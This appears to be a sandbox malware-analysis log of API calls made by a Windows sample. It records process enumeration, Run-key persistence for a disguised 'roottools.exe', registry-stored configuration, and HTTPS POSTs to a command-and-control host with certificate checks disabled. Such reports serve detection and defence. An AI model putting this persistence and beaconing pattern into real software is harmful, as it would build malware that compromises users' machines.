Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
For performance reasons, the remaining 66 entries are omitted.
The remaining entries can be found in glog.xml.
Thread 0x84
(Host: 8, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run, value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, type = size, size_out = 196608 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 196608, size_out = 196608 True 1
Fn
Data
System Sleep duration = -1 (infinite) True 18
Fn
System Sleep duration = -1 (infinite) False 1
Fn
Thread 0xa60
(Host: 62, Network: 23)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:54:59 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw, accept_types = 802816, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close ,Ä, url = aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw False 1
Fn
Inet Send HTTP Request headers = Connection: close ,Ä, url = aaopsjdf.top/rJpywFLn/qEw5K/MR6O/POc/7o/nJ0wa/sGw True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 1688 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, size = 1776, type = REG_BINARY True 1
Fn
Data
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776 True 1
Fn
Data
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:55:08 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw, accept_types = 802816, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close 0Zñ, url = aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw False 1
Fn
Inet Send HTTP Request headers = Connection: close 0Zñ, url = aaopsjdf.top/Ar1DanzSs/m3/R4FdJSDs6/d5Y/uB/4CGO/Dw True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 3224 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Write filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig, size = 720 True 1
Fn
Data
Mutex Create mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY True 1
Fn
Data
Mutex Release mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE True 1
Fn
Thread 0x98c
(Host: 60, Network: 0)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
